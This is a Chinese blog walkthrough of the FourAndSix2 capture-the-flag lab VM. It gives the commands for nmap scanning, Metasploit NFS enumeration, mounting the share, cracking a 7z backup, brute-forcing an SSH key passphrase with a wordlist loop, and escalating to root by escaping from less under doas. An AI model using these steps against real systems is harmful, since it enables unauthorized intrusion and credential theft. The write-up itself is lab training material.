靶机渗透之FourAndSix2(二)

一、环境准备

一台kali,一台FourAndSix2,能相互ping通

二、靶机发现

1.主机发现,用kali扫描靶机ip地址为192.168.19.156

nmap -sP 192.168.19.0/24

在这里插入图片描述
2.扫描靶机开放了哪些端口

nmap -sV 192.168.19.156

可以发现靶机开放了22 111 2049端口,可以从ssh服务、nfs服务进行入手
在这里插入图片描述

三、渗透过程

1.通过端口服务扫描,首先从nfs服务入手,利用msf的nfs模块

search nfs
use auxiliary/scanner/nfs/nfsmount
set rhosts 192.168.19.156
exploit

在这里插入图片描述
2.通过攻击发现有一个nfs共享目录,kali去挂载这个目录

mount -t nfs 192.168.19.156:/home/user/storage /mnt

3.进入挂载目录发现有一个备份文件,解压发现需要密码,利用rarcrack进行爆破
在这里插入图片描述
爆破:

apt-get install rarcrack
rarcrack --threads 4 --type 7z backup.7z

![在这里插入图片描述](https://img-blog.csdnimg.cn/20200720104719711.png
最终,7z破解脚本成功破解到压缩包密码:chocolate,解压出来发现一堆图片和ssh公、私钥
在这里插入图片描述

4.把公钥复制到/root/.ssh尝试使用ssh私钥登录目标,发现对私钥进行了口令认证

cp id_rsa /root/.ssh/
ssh user@192.168.19.156

在这里插入图片描述

5.使用以下脚本,爆破私钥密码,爆破出12345678

cat /usr/share/wordlists/metasploit/adobe_top100_pass.txt  |while read pass;do if ssh-keygen -c -C "user@forandsix" -P $pass -f id_rsa &>/dev/null;then echo $pass; break; fi; done

在这里插入图片描述
6.进入系统后,收集一些常用信息,查看内核版本,查看id
在这里插入图片描述
在这里插入图片描述

7.查看是否存在可执行的二进制文件,以及带有s标志位的文件
在这里插入图片描述
发现通过find命令我们找到了suid权限运行的程序/usr/bin/doas,它是sudo命令的替代。doas是BSD系列系统下的权限管理工具,类似于Debian系列下的sudo命令

8查看doas.conf,发现当前用户能够以root权限使用less命令查看/var/log/authlog文件,并且不需要输入密码,此时可以通过进入编辑模式(按v),输入/bin/sh获得root权限
在这里插入图片描述
9.执行命令

Doas /usr/bin/less /var/log/authlog

按v,进入编辑模式,输入如下内容
在这里插入图片描述

10.提权成功后,查看/root/flag.txt,即可获得flag
在这里插入图片描述

四、总结

1、信息收集

2、nfs共享资源

3、破解7z压缩文件夹,ssh私钥登录、破解私钥口令

4、OpenBSD类linux系统

5、doas管理工具提权

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值